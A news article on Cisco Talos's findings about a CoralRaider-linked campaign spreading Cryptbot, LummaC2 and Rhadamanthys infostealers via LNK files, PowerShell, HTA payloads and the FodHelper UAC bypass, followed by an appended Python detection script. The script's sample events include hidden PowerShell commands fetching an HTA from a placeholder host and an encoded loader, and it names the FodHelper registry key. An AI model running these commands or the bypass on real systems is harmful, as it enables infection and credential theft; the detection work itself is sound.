24 April 2024

Ongoing malware campaign targets multiple industries, distributes infostealers

Cisco Talos, the company's threat intelligence research group, has uncovered a sophisticated and ongoing cyber campaign that has targeted victims across multiple countries since at least February 2024 with three infostealer malware variants: Cryptbot, LummaC2, and Rhadamanthys.

This malware is designed to harvest sensitive information from victims, including system and browser data, credentials, cryptocurrency wallets, and financial information.

One of the key findings about the campaign, which is suspected to be linked to CoralRaider, a financially motivated threat actor of Vietnamese origin that Talos disclosed in early April, is the deployment of a new PowerShell command-line argument embedded within LNK files. It is aimed at bypassing antivirus products and facilitating the download of the final payload onto victims' systems. The campaign leverages a Content Delivery Network (CDN) cache domain as a download server, hosting malicious HTA files and payloads.

Talos researchers have identified several tactics, techniques, and procedures (TTPs) employed in this campaign that bear similarities to CoralRaider's previous Rotbot campaign. These include the use of Windows Shortcut files as the initial attack vector, intermediate PowerShell decryptors and payload download scripts, and the FodHelper technique to bypass User Account Control (UAC) on victim machines.

Talos has identified multiple command-and-control (C2) domains utilized by the threat actor in this campaign.

The campaign targets various industries and geographies, with victims reported in countries such as the US, Nigeria, Pakistan, Ecuador, Germany, Egypt, the UK, Poland, the Philippines, Norway, Japan, Syria, and Turkey. Telemetry data indicates that affected users also include employees of Japan's computer service call center organizations and civil defense service organizations in Syria.

According to Talos, the campaign's initial access vector appears to be phishing emails with links leading to ZIP archives containing Windows shortcut (LNK) files. The shortcut files execute PowerShell scripts to fetch the next-stage HTA payload hosted on the CDN cache. Next, JavaScript code embedded within the payload launches a concealed PowerShell loader, leading to the deployment of one of the three infostealer malware variants.
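As an added example (not part of this article or of the Talos report), the following Python sketch shows how a defender could flag the three stages of the chain described above in process-creation and registry telemetry: an explorer-launched PowerShell fetching a remote HTA, mshta.exe spawning a hidden PowerShell loader, and the registry key the FodHelper UAC bypass relies on being written. The Sysmon-like event shape, the domain, file names and SID in the sample events are constructed; the ms-settings registry path is the one the FodHelper technique is documented to use.

```python
import os
import re

# Rules for the chain in the article: LNK -> PowerShell fetching an HTA from a
# CDN cache, HTA/JavaScript -> concealed PowerShell loader, FodHelper UAC bypass.
HTA_URL = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)
FODHELPER_KEY = re.compile(r"\\Classes\\ms-settings\\shell\\open\\command", re.IGNORECASE)


def _base(path):
    """Lower-cased file name of a Windows path."""
    return os.path.basename(path.replace("\\", "/")).lower()


def classify(ev):
    """Return the names of the rules a single event matches."""
    hits = []
    if ev["id"] == 1:  # process creation
        parent, image = _base(ev["parent"]), _base(ev["image"])
        if parent == "explorer.exe" and image == "powershell.exe" and HTA_URL.search(ev["cmd"]):
            hits.append("lnk_powershell_fetches_hta")
        if parent == "mshta.exe" and image == "powershell.exe":
            hits.append("mshta_spawns_powershell")
    elif ev["id"] == 13:  # registry value set
        if FODHELPER_KEY.search(ev["target"]):
            hits.append("fodhelper_uac_bypass_key_set")
    return hits


def detect(events):
    """Run every rule over a list of events; returns (event index, rule) pairs."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]


# Constructed sample events (not real telemetry): EventID 1 = process creation,
# EventID 13 = registry value set. Domain, SID and paths are placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmd": 'powershell.exe -w hidden -c "iwr https://cdn-cache.example/stage.hta -o $env:TEMP\\s.hta"'},
    {"id": 1, "parent": r"C:\Windows\System32\mshta.exe", "image": PS,
     "cmd": "powershell.exe -ep bypass -w hidden -enc <base64-placeholder>"},
    {"id": 13, "image": PS,
     "target": r"HKU\S-1-5-21-1-2-3-1001\Software\Classes\ms-settings\shell\open\command\(Default)"},
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmd": "notepad.exe notes.txt"},  # benign control event, should not match
]

if __name__ == "__main__":
    for idx, rule in detect(EVENTS):
        print(f"event {idx}: {rule}")
```

Each rule on its own is noisy in a large fleet; the signal is the three firing in sequence on one host within a short window.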
